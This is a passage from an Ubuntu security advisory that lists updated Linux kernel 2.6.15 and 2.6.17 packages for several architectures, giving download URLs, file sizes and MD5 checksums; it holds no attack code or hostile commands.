Size/MD5:     8754 45f769ff783acfb2a996ee2e707d547e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb\n      Size/MD5:    53594 477d3562d0a9de84191a7be0999c6e45\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb\n      Size/MD5:   130774 5f6a2d635f1ff032c401f454c1a0496c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb\n      Size/MD5:    98412 9cc716b9dab804837cc53130008fc5ec\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb\n      Size/MD5:    77174 502e6544805144ed5d9df0ac24592771\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb\n      Size/MD5:  1768404 74797234b6c3315013bd9896eaf3be15\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb\n      Size/MD5:    69564 b80322f8074fc6040fcff28a4d75aca7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb\n      Size/MD5:    11760 e1baffd19bb6ab5d05dbe2feb9f51f3d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb\n      Size/MD5:    36004 79c83133b8cd5332d987af6732b5a6c8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb\n      Size/MD5:   132396 8974418e303a296cb54d3374d7ddbc7e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb\n      Size/MD5:    38558 a7e86b9c3ea22c24aa02ec85e468027a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb\n      Size/MD5:   299120 fcbba364de96ff32f4e000960d865dbc\n\n  powerpc architecture (Apple Macintosh G3/G4/G5):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/affs-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb\n      Size/MD5:    23720 71c7a353660e8ba4cd1bb2a725e8794a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/affs-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb\n      Size/MD5:    25946 31100ff20bf8a91d255baffdb7ed24c0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb\n      Size/MD5:    49310 3917c41f951d8135b58d384cc295ba3f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb\n      Size/MD5:    51522 068cf8545f1c6e84713872fa09f7ff01\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb\n      Size/MD5:     2298 8dc27a2b671eeac1cf741e9f017608e1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb\n      Size/MD5:     2478 39954bd290beee900a99cf4e18236500\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb\n      Size/MD5:    40180 455ec7c5f4c44e5c0c49346656a8c91e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb\n      Size/MD5:    43752 5b639ddf72bd3c8b86b758fe7e282c91\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb\n      Size/MD5:   112606 14b8d1dde7b73685eba425afb8137aa5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb\n      Size/MD5:   120650 990d9bd729ec95c4a64c0cc44d6ce511\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb\n      Size/MD5:    40844 6aacad8fde4f19deab9fb6b5a82fa021\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb\n      Size/MD5:    45948 131fe39130f08767edc073bb7fff91c4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb\n      Size/MD5:    29024 9f8268948ddda0fd06bf0422287f04e2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb\n      Size/MD5:    29896 52b3144e286bb4f43db1ebd6371ca6a2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb\n      Size/MD5:   211404 5cdadc28df070e7fec3425a7ae4e7237\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb\n      Size/MD5:   225206 14a95c507a5e9498fdf19dbf90055d19\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb\n      Size/MD5:    45050 d251407f11177dc5eff3e83adb6b8879\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb\n      Size/MD5:    40214 8b75f8145a1a950862d98f4508a687ae\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fs-common-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb\n      Size/MD5:     1932 370a87957eab079087b8b42c6d874a6c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fs-common-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb\n      Size/MD5:     2196 101e82bbe9f4091d0be2a314547f5445\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/hfs-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb\n      Size/MD5:    80610 20d208d10bbd6dc7993a542ddc85946f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/hfs-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb\n      Size/MD5:    85962 325dc6c16f674c06c6bc0a0e4c8f48d3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb\n      Size/MD5:   111636 3d777ec6f6a207ef5edb3a433646bbd6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb\n      Size/MD5:   125798 1fa189d90bf1ab134b6df072cf8c57eb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb\n      Size/MD5:    53406 16e226cce6f3aa1c1d3060a3f5e112fe\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb\n      Size/MD5:    58478 abfb59df627d4449f15889566f1ca321\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb\n      Size/MD5:   147758 4c740241e4cf4dd99047563ff906134d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb\n      Size/MD5:   161708 94713d944992ff495a8b06f7f8b0408c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb\n      Size/MD5:   317488 9825301a5a53d42152eb325b6e75f41b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb\n      Size/MD5:   287588 f3fd4d02234eaead52ca6f7175a0ab94\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb\n      Size/MD5:   115852 06db1d8c68b986d8ed5227e58d1b37fb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb\n      Size/MD5:   116518 45d5239edf3d33ad57415a5d8cd6c609\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb\n      Size/MD5:  1923398 4408c098e595544fcfd4c733fd05e171\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb\n      Size/MD5:  2436410 aba89b7121acb495de41d21de717f343\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-29-powerpc-smp_2.6.15-29.60_powerpc.deb\n      Size/MD5:   871286 def32ee67cef0fb005d6974495b7336d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-29-powerpc64-smp_2.6.15-29.60_powerpc.deb\n      Size/MD5:   865650 346ba91a7933f7077d637d699c339704\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-29-powerpc_2.6.15-29.60_powerpc.deb\n      Size/MD5:   869412 f46a8e9cff526da2a14669686b645a35\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-29_2.6.15-29.60_powerpc.deb\n      Size/MD5:  6939760 781f0d4d1c1944f04501b64f3836b47d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-29-powerpc-smp_2.6.15-29.60_powerpc.deb\n      Size/MD5: 22771282 e1b124721406c6b53c9a4e71095a7ba1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-29-powerpc64-smp_2.6.15-29.60_powerpc.deb\n      Size/MD5: 23660438 77f33e3630afd0d868a93f73ae6ce971\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-29-powerpc_2.6.15-29.60_powerpc.deb\n      Size/MD5: 22345100 20b7671c82d0018c052af93980fd2387\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb\n      Size/MD5:    17776 25c3e8dd71622fde5e04a4e8226f8bd8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb\n      Size/MD5:    17380 5f65b0013ced25fd3e3c97e855dcfb59\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb\n      Size/MD5:   261144 0850d394737d72d2b69cccb90d8bd298\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb\n      Size/MD5:   282362 dc990649bbcae62551eb1d82a186e1d2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb\n      Size/MD5:   227460 6697fdf2fc11167e650c154149dedf73\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb\n      Size/MD5:   248672 8b6f55be661e7658641b4bf907449b16\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb\n      Size/MD5:  1048460 b92207c7d247b006865f4efb43af4c26\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb\n      Size/MD5:  1048602 04bc72dfbe3178226f56bcf659aeb329\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb\n      Size/MD5:  1673618 bfcca94316d72ef3fe37663fb50d49cb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb\n      Size/MD5:  1808832 bf0120f79276e526ef3a6c725baf14b0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb\n      Size/MD5:   250938 7299878a93cdaa4774374977af8578d1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb\n      Size/MD5:   233676 936608603971bc17da1d7eb454019002\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb\n      Size/MD5:    13028 9d1fadfa7db678a207fb41fca4c9c8fd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb\n      Size/MD5:    13520 ca02a743ad543f2fe0a34aca46a1b8dc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb\n      Size/MD5:    84828 838270387082b8790865142c322f3633\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb\n      Size/MD5:    52190 55d9d3ec73d5bf63771bae39f3afde2a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb\n      Size/MD5:    73922 8b247b5ba9a5f30d5ae902fe40404c5c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb\n      Size/MD5:    85842 03aed80fffc10e279ea3b579a145077b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb\n      Size/MD5:     6614 2ec4eb15148b5d34078942f3067093ff\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb\n      Size/MD5:     7062 2f479a6496c2c309ffbb0faca1445b62\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb\n      Size/MD5:    60354 c7bbac75e71a8941f13c2a78216bc950\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb\n      Size/MD5:    70344 6d5419510b75944b5e2f4bd448ba1319\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb\n      Size/MD5:   128540 391195c7cecdf7d9b4f45fe1ab560cd1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb\n      Size/MD5:   157796 6c70763c24a705dfa0eb879a520b8c15\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb\n      Size/MD5:   107926 72e4e26c739ff9f3a1447aebae381c1e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb\n      Size/MD5:   125994 f2b44cbfd5b45da765b5b4b07bec046d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb\n      Size/MD5:    87302 a6cfc94b165e166dfbe252cc4896a0d5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb\n      Size/MD5:    93314 133e824e92874f3d0ad52fd939e8a6bd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb\n      Size/MD5:  2013978 d38120c97ad1709fab469b15c2bbae5a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb\n      Size/MD5:  1988082 e74a6bf1b287e56dd22de0f0277bb56c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb\n      Size/MD5:   104106 26288f2ec996674070cc33b01bc10d60\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb\n      Size/MD5:   115700 28120f26d175bb1c918148c712f2a1ec\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb\n      Size/MD5:    12734 575a1e0b57493766b89cbe2073c607c3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb\n      Size/MD5:    14438 5d024158fb0968eb15c4258c572793c9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb\n      Size/MD5:    39942 51288398e47db398b0963f3cabddd1c2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb\n      Size/MD5:    41468 654fbdcecfabd8e2f82018eb0c79ec7e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb\n      Size/MD5:   149096 8eb8cacd2c42b67a99184ecd532954a9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb\n      Size/MD5:   167806 275e5b337af9824da2d32674e4002441\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb\n      Size/MD5:    42264 cdd311c34cd98b72505cb9b7fc29e54d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb\n      Size/MD5:    44864 5968ad9249a390b7b6f945e7e886b38d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb\n      Size/MD5:   320282 567132be9ab4915e8a727dca3825cce1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb\n      Size/MD5:   324706 0e1c34481464c21d9c549e6d8ab56f74\n\n  sparc architecture (Sun SPARC/UltraSPARC):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-29-sparc64-di_2.6.15-29.60_sparc.udeb\n      Size/MD5:    50460 122260eef1dbe81b1881eca73cf34511\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-29-sparc64-di_2.6.15-29.60_sparc.udeb\n      Size/MD5:     2352 0ca1bcc3e2419fccaaec14d144350b20\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-29-sparc64-di_2.6.15-29.60_sparc.udeb\n      Size/MD5:    40318 1d3bbb903f0cd1d8c6dde3986f7fcb71\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-29-sparc64-di_2.6.15-29.60_sparc.udeb\n      Size/MD5:   110514 1aec1e36c2ace3768412f85a6bb32b83\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-29-sparc64-di_2.6.15-29.60_sparc.udeb\n      Size/MD5:    41164 4e857743fe021a630e9603902433e699\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-29-sparc64-di_2.6.15-29.60_sparc.udeb\n      Size/MD5:   104230 a9627f63768ce523a613a2fe3e909932\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-29-sparc64-di_2.6.15-29.60_sparc.udeb\n      Size/MD5:     7434 0398c8cd2a3ddd6f4668e2fc06d6501e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-29-sparc64-di_2.6.15-29.60_sparc.udeb\n      Size/MD5:   149018 e2a311dc228e0cfcb50f3de557b5ec4b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-29-sparc64-di_2.6.15-29.60_sparc.udeb\n      Size/MD5:  1708170 517223272ea5c253b8af308f9a6b1f0a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-29-sparc64-smp_2.6.15-29.60_sparc.deb\n      Size/MD5:   768058 d951ceb425e2545ddfacbd9903b4e2d6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-29-sparc64_2.6.15-29.60_sparc.deb\n      Size/MD5:   767444 61c117b065e8530ac82cf713b28a4ce8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-29_2.6.15-29.60_sparc.deb\n      Size/MD5:  6953066 be53cfd8bac058a184949486a4ee375e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-29-sparc64-smp_2.6.15-29.60_sparc.deb\n      Size/MD5: 15002518 948e0705c2043861706cd39dfefb0961\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-29-sparc64_2.6.15-29.60_sparc.deb\n      Size/MD5: 14818188 72edbea8d476c99cc2ddb0abeeb08750\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-29-sparc64-di_2.6.15-29.60_sparc.udeb\n      Size/MD5:     7422 e7fb8bc57b20365a81768e98ef5e05ee\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-29-sparc64-di_2.6.15-29.60_sparc.udeb\n      Size/MD5:   248516 3243cb52073355711a03149b94a4b113\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-29-sparc64-di_2.6.15-29.60_sparc.udeb\n      Size/MD5:   212254 e54a947086429985c690c33fa3b82eb8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-29-sparc64-di_2.6.15-29.60_sparc.udeb\n      Size/MD5:  1048436 664e62e3f4e612e9532a76a0ebc6b72a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-29-sparc64-di_2.6.15-29.60_sparc.udeb\n      Size/MD5:  1421620 d7979dc768f2a8489e1f001348c42296\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-29-sparc64-di_2.6.15-29.60_sparc.udeb\n      Size/MD5:    10122 b69d5c2ec7c75714c84bcadbb039dcaa\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-29-sparc64-di_2.6.15-29.60_sparc.udeb\n      Size/MD5:    40182 bdbdd74f461c09d1e4ca0e0fa262b119\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-29-sparc64-di_2.6.15-29.60_sparc.udeb\n      Size/MD5:     9360 2fe0cbcd916e3b298aaf4527bdafb80e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-29-sparc64-di_2.6.15-29.60_sparc.udeb\n      Size/MD5:    61446 2654965940d7e649fb5abcfa886a4f51\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-29-sparc64-di_2.6.15-29.60_sparc.udeb\n      Size/MD5:   163010 9165e588df1065c4d83509125bc1752b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-29-sparc64-di_2.6.15-29.60_sparc.udeb\n      Size/MD5:    63986 e20b3398eaf223a365bbccd0fad14383\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-29-sparc64-di_2.6.15-29.60_sparc.udeb\n      Size/MD5:  1235104 ef88ccfedacbc52ef7549a62431fe0c5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-29-sparc64-di_2.6.15-29.60_sparc.udeb\n      Size/MD5:    59352 c81290c1da7258811e9b31d9d62b442b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-29-sparc64-di_2.6.15-29.60_sparc.udeb\n      Size/MD5:    37400 96a0767df52f78a9a5546692ec73e39f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-29-sparc64-di_2.6.15-29.60_sparc.udeb\n      Size/MD5:   280066 8edb68d49b4768abfbdfe791960c7aaa\n\nUpdated packages for Ubuntu 6.10:\n\n  Source archives:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-source-2.6.17_2.6.17.1-12.41.diff.gz\n      Size/MD5:  2074599 1b5504b1af8fbe44c4d62bb295b6b159\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-source-2.6.17_2.6.17.1-12.41.dsc\n      Size/MD5:     2324 cfb49d319e8dfdc1e2e06b9a4f703c50\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-source-2.6.17_2.6.17.1.orig.tar.gz\n      Size/MD5: 59339565 2e5451201e38e865cbc7b0717fa124a1\n\n  Architecture independent packages:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-doc-2.6.17_2.6.17.1-12.41_all.deb\n      Size/MD5:  4507110 65ddf77da17b550ddde03d4eab15b313\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-kernel-devel_2.6.17.1-12.41_all.deb\n      Size/MD5:  1097858 21259d89d5020f37fe3fcf45fe937c54\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-source-2.6.17_2.6.17.1-12.41_all.deb\n      Size/MD5: 46079888 c42bed702916d7098ecb51bcd5d73921\n\n  amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/acpi-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb\n      Size/MD5:    28614 9117a5fc208dfd877870e9847d39e1e9\n    